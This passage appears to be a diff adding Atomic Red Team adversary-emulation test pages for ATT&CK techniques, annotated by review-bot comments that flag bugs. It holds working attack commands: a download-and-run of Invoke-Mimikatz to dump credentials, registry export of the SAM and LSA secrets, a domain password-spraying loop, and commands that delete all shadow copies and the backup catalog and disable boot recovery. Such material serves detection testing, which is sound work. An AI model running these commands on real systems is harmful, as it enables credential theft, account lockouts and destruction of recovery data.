Tools](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1219/t1219.md) | | | [Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1121/t1121.md) | [External Remote Services](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1133/t1133.md) | [Path Interception](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1034/t1034.md) | [Exploitation for Defense Evasion](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1211/t1211.md) | [Password Filter DLL](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1174/t1174.md) | [System Network Connections Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1049/t1049.md) | [Windows Admin Shares](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1077/t1077.md) | | | [Remote File Copy](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1105/t1105.md) | -| | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1117/t1117.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1044/t1044.md) | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1150/t1150.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1181/t1181.md) | [Private Keys](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1145/t1145.md) | [System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1033/t1033.md) | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1028/t1028.md) | | | [Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1071/t1071.md) | -| | [Rundll32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1085/t1085.md) | [Hidden Files and 
Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1158/t1158.md) | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1013/t1013.md) | [File Deletion](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1107/t1107.md) | [Replication Through Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1091/t1091.md) | [System Service Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1007/t1007.md) | | | | [Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1032/t1032.md) | +| | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1117/t1117.md) | [File System Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1044/t1044.md) | [Plist Modification](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1150/t1150.md) | [Extra Window Memory Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1181/t1181.md) | [Private Keys](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1145/t1145.md) | [System Owner/User Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1033/t1033.md) | [Windows Remote Management](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1028/t1028.md) | | | [Standard Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1071/t1071.md) | +| | [Rundll32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1085/t1085.md) | [Hidden Files and Directories](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1158/t1158.md) | [Port Monitors](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1013/t1013.md) | [File Deletion](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1107/t1107.md) | [Replication Through 
Removable Media](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1091/t1091.md) | [System Service Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1007/t1007.md) | | | | [Standard Cryptographic Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1032/t1032.md) | | | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1053/t1053.md) | [Hooking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1179/t1179.md) | [Process Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1055/t1055.md) | [File System Logical Offsets](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1006/t1006.md) | [Securityd Memory](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1167/t1167.md) | [System Time Discovery](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1124/t1124.md) | | | | [Standard Non-Application Layer Protocol](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1095/t1095.md) | | | [Scripting](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1064/t1064.md) | [Hypervisor](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1062/t1062.md) | [SID-History Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1178/t1178.md) | [Gatekeeper Bypass](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1144/t1144.md) | [Two-Factor Authentication Interception](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1111/t1111.md) | | | | | [Uncommonly Used Port](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1065/t1065.md) | | | [Service Execution](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1035/t1035.md) | [Image File Execution Options Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1183/t1183.md) | 
[Scheduled Task](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1053/t1053.md) | [HISTCONTROL](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1148/t1148.md) | | | | | | [Web Service](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1102/t1102.md) | 
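Review bot: the index.md hunks switch only the links for the techniques touched in this change (T1107, T1117, plus the earlier T1158 and T1148) from GitHub's `/edit/master/` URL to `/tree/master/`, while every other cell in the same matrix rows still points at `/edit/master/`. The edit URL opens GitHub's in-browser editor and prompts for sign-in instead of showing the rendered technique page, so readers of the index cannot follow it; either convert the remaining links in the same pass or fix the generator so that newly added techniques do not come out in the edit form again.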
@@ -46,7 +46,7 @@ | | | [Scheduled Task](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1053/t1053.md) | | [Process Injection](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1055/t1055.md) | | | | | | | | | | [Screensaver](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1180/t1180.md) | | [Redundant Access](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1108/t1108.md) | | | | | | | | | | [Security Support Provider](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1101/t1101.md) | | [Regsvcs/Regasm](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1121/t1121.md) | | | | | | | -| | | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1058/t1058.md) | | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1117/t1117.md) | | | | | | | +| | | [Service Registry Permissions Weakness](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1058/t1058.md) | | [Regsvr32](https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/t1117/t1117.md) | | | | | | | | | | [Shortcut Modification](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1023/t1023.md) | | [Rootkit](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1014/t1014.md) | | | | | | | | | | [Startup Items](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1165/t1165.md) | | [Rundll32](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1085/t1085.md) | | | | | | | | | | [System Firmware](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1019/t1019.md) | | [SIP and Trust Provider Hijacking](https://github.com/redcanaryco/atomic-red-team/edit/master/atomics/t1198/t1198.md) | | | | | | | diff --git a/atomics/t1002/t1002.md b/atomics/t1002/t1002.md new file mode 100644 index 00000000..1b88deb2 --- /dev/null 
+++ b/atomics/t1002/t1002.md @@ -0,0 +1,55 @@ +# T1002 - Data Compressed +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1002) +
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib. + +Detection: Compression software and compressed files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known compression utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used. + +If the communications channel is unencrypted, compressed files can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures) + +Platforms: Linux, macOS, Windows + +Data Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring + +Requires Network: No
+ +## Atomic Tests + +- [Atomic Test #1 - Compress Data for Exfiltration With PowerShell](#atomic-test-1---compress-data-for-exfiltration-with-powershell) + +- [Atomic Test #2 - Compress Data for Exfiltration With Rar](#atomic-test-2---compress-data-for-exfiltration-with-rar) + + +
+ +## Atomic Test #1 - Compress Data for Exfiltration With PowerShell +TODO + +**Supported Platforms:** windows + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | input_file | Path that should be compressed into our output file | Path | C:\*| + | output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip| + +#### Run it with `powershell`! +``` +dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} + +``` +
+
+ +## Atomic Test #2 - Compress Data for Exfiltration With Rar +TODO + +**Supported Platforms:** windows + + +#### Run it with `powershell`! +``` +rar a -r #{output_file} #{input_file} + +``` +
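Review bot: Atomic Test #2 in atomics/t1002/t1002.md runs `rar a -r #{output_file} #{input_file}` but has no `#### Inputs` section, so `output_file` and `input_file` are never defined for it and the placeholders are left unexpanded; copy the Inputs table from Test #1 and note that `rar.exe` is not present on a default Windows install, so the test needs a prerequisite. In Test #1 the table separator row `|-------------------------------------------|` is a single cell under a four-column header, so Markdown will not render it as a table; it needs one `---` segment per column. Both test descriptions are still the placeholder `TODO`.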
diff --git a/atomics/t1003/t1003.md b/atomics/t1003/t1003.md new file mode 100644 index 00000000..218fe316 --- /dev/null +++ b/atomics/t1003/t1003.md @@ -0,0 +1,214 @@ +# T1003 - Credential Dumping +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003) +
Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information. + +Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well. + +===SAM (Security Accounts Manager)=== + +The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required. +  +A number of tools can be used to retrieve the SAM file through in-memory techniques: +* pwdumpx.exe +* gsecdump +* Mimikatz +* secretsdump.py + +Alternatively, the SAM can be extracted from the Registry with Reg: +* reg save HKLM\sam sam +* reg save HKLM\system system + +Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7) + +Notes: +Rid 500 account is the local, in-built administrator. +Rid 501 is the guest account. +User accounts start with a RID of 1,000+. + +===Cached Credentials=== + +The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks. +  +A number of tools can be used to retrieve the SAM file through in-memory techniques. +* pwdumpx.exe +* gsecdump +* Mimikatz + +Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials. + +Notes: +Cached credentials for Windows Vista are derived using PBKDF2. 
+ +===Local Security Authority (LSA) Secrets=== + +With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets. +  +When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well. +  +A number of tools can be used to retrieve the SAM file through in-memory techniques. +* pwdumpx.exe +* gsecdump +* Mimikatz +* secretsdump.py + +Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials. + +Notes: +The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. +Windows 10 adds protections for LSA Secrets described in Mitigation. + +===NTDS from Domain Controller=== + +Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory) + +The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. +  +* Volume Shadow Copy +* secretsdump.py +* Using the in-built Windows tool, ntdsutil.exe +* Invoke-NinjaCopy + +===Group Policy Preference (GPP) Files=== + +Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts. +  +These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. 
(Citation: Microsoft GPP Key) (Citation: SRD GPP) +  +The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files: +  +* Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp" +* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword) +* gpprefdecrypt.py +  +Notes: +On the SYSVOL share, the following can be used to enumerate potential XML files. +dir /s *.xml + +===Service Principle Names (SPNs)=== + +See Kerberoasting. + +===Plaintext Credentials=== + +After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM. +  +SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications. + +The following SSPs can be used to access credentials: +  +Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. +Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection) +Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. +CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP) +  +The following tools can be used to enumerate credentials: +  +* Windows Credential Editor +* Mimikatz +  +As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. 
+  +For example, on the target host use procdump: +* procdump -ma lsass.exe lsass_dump +  +Locally, mimikatz can be run: +* sekurlsa::Minidump lsassdump.dmp +* sekurlsa::logonPasswords + +===DCSync=== + +DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in Account Manipulation. (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017) + +Detection: Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective Process Injection to reduce potential indicators of malicious activity. 
+ +Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised Valid Accounts in-use by adversaries may help as well. + +On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process. + +Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis. + +Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015) + +Platforms: Windows + +Data Sources: API monitoring, Process command-line parameters, Process monitoring, PowerShell logs + +Permissions Required: Administrator, SYSTEM + +Contributors: Vincent Le Toux, Ed Williams, Trustwave, SpiderLabs
+ +## Atomic Tests + +- [Atomic Test #1 - Powershell Mimikatz](#atomic-test-1---powershell-mimikatz) + +- [Atomic Test #2 - Gsecdump](#atomic-test-2---gsecdump) + +- [Atomic Test #3 - Windows Credential Editor](#atomic-test-3---windows-credential-editor) + +- [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets) + + +
+ +## Atomic Test #1 - Powershell Mimikatz +Dumps Credentials via Powershell by invoking a remote mimikatz script + +**Supported Platforms:** windows + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1| + +#### Run it with `powershell`! +``` +IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds + +``` +
+
+ +## Atomic Test #2 - Gsecdump +https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +gsecdump -a + +``` +
+
+ +## Atomic Test #3 - Windows Credential Editor +http://www.ampliasecurity.com/research/windows-credentials-editor/ + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +wce -o #{output_file} + +``` +
+
+ +## Atomic Test #4 - Registry dump of SAM, creds, and secrets +Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated +via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +reg save HKLM\sam sam +reg save HKLM\system system +reg save HKLM\security security + +``` +
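Review bot: Atomic Test #3 (`wce -o #{output_file}`) in atomics/t1003/t1003.md references `output_file` without an Inputs table defining it, so there is no default and the placeholder is never substituted. Test #1's Inputs table has the single-cell separator row `|-------------------------------------------|` under a four-column header, which breaks Markdown rendering. Test #1 also downloads and runs Invoke-Mimikatz from a third-party `master` branch at run time, so the test is network-dependent and its content can change between runs; the description should state that prerequisite and the URL should be pinned to a commit. The descriptions of Tests #2 and #3 are bare URLs rather than a sentence saying what the test does, and Test #4's description should mention that the three `reg save` commands write the `sam`, `system` and `security` hive files into the current working directory so the tester knows what to clean up.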
diff --git a/atomics/t1107/t1107.md b/atomics/t1107/t1107.md new file mode 100644 index 00000000..07841464 --- /dev/null +++ b/atomics/t1107/t1107.md @@ -0,0 +1,249 @@ +# T1107 - File Deletion +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1107) +
Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. + +There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools) + +Detection: It may be uncommon for events related to benign command-line functions such as DEL or third-party utilities or tools to be found in an environment, depending on the user base and how systems are typically used. Monitoring for command-line deletion functions to correlate with binaries or other files that an adversary may drop and remove may lead to detection of malicious activity. Another good practice is monitoring for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce. Some monitoring tools may collect command-line arguments, but may not capture DEL commands since DEL is a native function within cmd.exe. + +Platforms: Linux, Windows, macOS + +Data Sources: Binary file metadata, File monitoring, Process command-line parameters + +Defense Bypassed: Host forensic analysis + +Permissions Required: User + +Contributors: Walker Johnson
+ +## Atomic Tests + +- [Atomic Test #1 - Victim configuration](#atomic-test-1---victim-configuration) + +- [Atomic Test #2 - Delete a single file](#atomic-test-2---delete-a-single-file) + +- [Atomic Test #3 - Delete an entire folder](#atomic-test-3---delete-an-entire-folder) + +- [Atomic Test #4 - Overwrite and delete a file with shred](#atomic-test-4---overwrite-and-delete-a-file-with-shred) + +- [Atomic Test #5 - Victim configuration](#atomic-test-5---victim-configuration) + +- [Atomic Test #6 - Delete a single file - cmd](#atomic-test-6---delete-a-single-file---cmd) + +- [Atomic Test #7 - Delete an entire folder - cmd](#atomic-test-7---delete-an-entire-folder---cmd) + +- [Atomic Test #8 - Delete a single file - ps](#atomic-test-8---delete-a-single-file---ps) + +- [Atomic Test #9 - Delete an entire folder - ps](#atomic-test-9---delete-an-entire-folder---ps) + +- [Atomic Test #10 - Delete VSS - vssadmin](#atomic-test-10---delete-vss---vssadmin) + +- [Atomic Test #11 - Delete VSS - wmic](#atomic-test-11---delete-vss---wmic) + +- [Atomic Test #12 - bcdedit](#atomic-test-12---bcdedit) + +- [Atomic Test #13 - wbadmin](#atomic-test-13---wbadmin) + + +
+ +## Atomic Test #1 - Victim configuration +Create a temporary directory and several files on the victim system for later deletion + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +mkdir /tmp/victim-files +cd /tmp/victim-files +touch a b c d e f g +echo "This file will be shredded" > /tmp/victim-shred.txt + +``` +
+
+ +## Atomic Test #2 - Delete a single file +Delete a single file from the temporary directory + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +rm -f /tmp/victim-files/a + +``` +
+
+ +## Atomic Test #3 - Delete an entire folder +Recursively delete the temporary directory and all files contained within it + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +rm -rf /tmp/victim-files + +``` +
+
+ +## Atomic Test #4 - Overwrite and delete a file with shred +Use the `shred` command to overwrite the temporary file and then delete it + +**Supported Platforms:** linux + + +#### Run it with `sh`! +``` +shred -u /tmp/victim-shred.txt + +``` +
+
+ +## Atomic Test #5 - Victim configuration +Create a temporary directory and several files on the victim system for later deletion + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +mkdir %TEMP%\victim-files-cmd +cd %TEMP%\victim-files-cmd +type nul > a +type nul > b +type nul > c +type nul > d +type nul > e +type nul > f +type nul > g +mkdir %TEMP%\victim-files-ps +cd %TEMP%\victim-files-ps +type nul > a +type nul > b +type nul > c +type nul > d +type nul > e +type nul > f +type nul > g + +``` +
+
+ +## Atomic Test #6 - Delete a single file - cmd +Delete a single file from the temporary directory using cmd.exe + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +del /f %TEMP%\victim-files-cmd\a + +``` +
+
+ +## Atomic Test #7 - Delete an entire folder - cmd +Recursively delete the temporary directory and all files contained within it using cmd.exe + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +del /f /S %TEMP%\victim-files-cmd + +``` +
+
+ +## Atomic Test #8 - Delete a single file - ps +Delete a single file from the temporary directory using Powershell + +**Supported Platforms:** windows + + +#### Run it with `powershell`! +``` +Remove-Item -path %TEMP%\victim-files-ps\a + +``` +
+
+ +## Atomic Test #9 - Delete an entire folder - ps +Recursively delete the temporary directory and all files contained within it using Powershell + +**Supported Platforms:** windows + + +#### Run it with `powershell`! +``` +Remove-Item -path %TEMP%\victim-files-ps -recurse + +``` +
+
+ +## Atomic Test #10 - Delete VSS - vssadmin +Delete all volume shadow copies with vssadmin.exe + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +vssadmin.exe Delete Shadows /All /Quiet + +``` +
+
+ +## Atomic Test #11 - Delete VSS - wmic +Delete all volume shadow copies with wmic + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +wmic shadowcopy delete + +``` +
+
+ +## Atomic Test #12 - bcdedit +xxx + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +bcdedit /set {default} bootstatuspolicy ignoreallfailures +bcdedit /set {default} recoveryenabled no + +``` +
+
+ +## Atomic Test #13 - wbadmin +xxx + +**Supported Platforms:** windows + + +#### Run it with `command_prompt`! +``` +wbdadmin delete catalog -quiet +``` +
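Review bot: Atomic Test #13 in atomics/t1107/t1107.md invokes `wbdadmin delete catalog -quiet`; the Windows binary is `wbadmin.exe`, so the command as written fails with "not recognized" and the test never exercises the behaviour. Other problems in the same file: Tests #8 and #9 run under `powershell` but use the cmd-style `%TEMP%`, which PowerShell does not expand (it should be `$env:TEMP`), so `Remove-Item` is handed a literal path that does not exist; Test #7's `del /f /S %TEMP%\victim-files-cmd` deletes the files inside the tree but leaves the directories in place, which does not match its description "Recursively delete the temporary directory" (`rmdir /s /q` would); Test #5 says it creates one directory but creates two (`victim-files-cmd` and `victim-files-ps`); and the descriptions of Tests #12 and #13 are the placeholder `xxx`. Tests #10 to #13 remove shadow copies, disable boot recovery and delete the backup catalog rather than deleting dropped files, so their descriptions should say so explicitly, since they are destructive on any host they are run on.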
diff --git a/atomics/t1110/t1110.md b/atomics/t1110/t1110.md new file mode 100644 index 00000000..dee4a763 --- /dev/null +++ b/atomics/t1110/t1110.md @@ -0,0 +1,54 @@ +# T1110 - Brute Force +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1110) +
Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained. + +Credential Dumping to obtain password hashes may only get an adversary so far when Pass the Hash is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network. (Citation: Wikipedia Password cracking) + +Adversaries may attempt to brute force logins without knowledge of passwords or hashes during an operation either with zero knowledge or by attempting a list of known or possible passwords. This is a riskier option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) + +A related technique called password spraying uses one password, or a small list of passwords, that matches the complexity policy of the domain and may be a commonly used password. Logins are attempted with that password and many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying) + +Detection: It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. + +Monitor authentication logs for system and application login failures of Valid Accounts. If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. + +Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. + +Platforms: Linux, macOS, Windows + +Data Sources: Authentication logs + +Permissions Required: User + +Contributors: John Strand
+ +## Atomic Tests + +- [Atomic Test #1 - Brute Force Credentials](#atomic-test-1---brute-force-credentials) + + +
+ +## Atomic Test #1 - Brute Force Credentials +Creates username and password files then attempts to brute force on remote host + +**Supported Platforms:** windows + + +#### Inputs +| Name | Description | Type | Default Value | +|-------------------------------------------| + | input_file_users | Path to a file containing a list of users that we will attempt to brute force | Path | DomainUsers.txt| + | input_file_passwords | Path to a file containing a list of passwords we will attempt to brute force with | Path | passwords.txt| + | remote_host | Hostname of the target system we will brute force upon | String | \\COMPANYDC1\IPC$| + | domain | Domain name of the target system we will brute force upon | String | YOUR_COMPANY| + +#### Run it with `command_prompt`! +``` +net user /domain > #{input_file_users} +echo "Password1" >> #{input_file_passwords} +echo "1q2w3e4r" >> #{input_file_passwords} +echo "Password!" >> #{input_file_passwords} +@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL +``` +
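Review bot: in atomics/t1110/t1110.md, Atomic Test #1 feeds the raw output of `net user /domain` into the loop, but that output includes the header line, the dashed separator and "The command completed successfully.", so the outer `FOR /F` also tries "User", "----" and "The" as usernames; and because `net user` lists several account names per line while `FOR /F` defaults to the first token, only the first name on each line is ever used. The description should also say the commands are meant for an interactive prompt: inside a .bat file the `%n`/`%p` variables would have to be written `%%n`/`%%p`. Since every iteration is a failed domain logon, the description should carry the lockout warning that the ATT&CK text above gives, so the test is only run against lab accounts.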
diff --git a/atomics/t1113/t1113.md b/atomics/t1113/t1113.md new file mode 100644 index 00000000..78460fe7 --- /dev/null +++ b/atomics/t1113/t1113.md @@ -0,0 +1,107 @@ +# T1113 - Screen Capture +## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1113) +
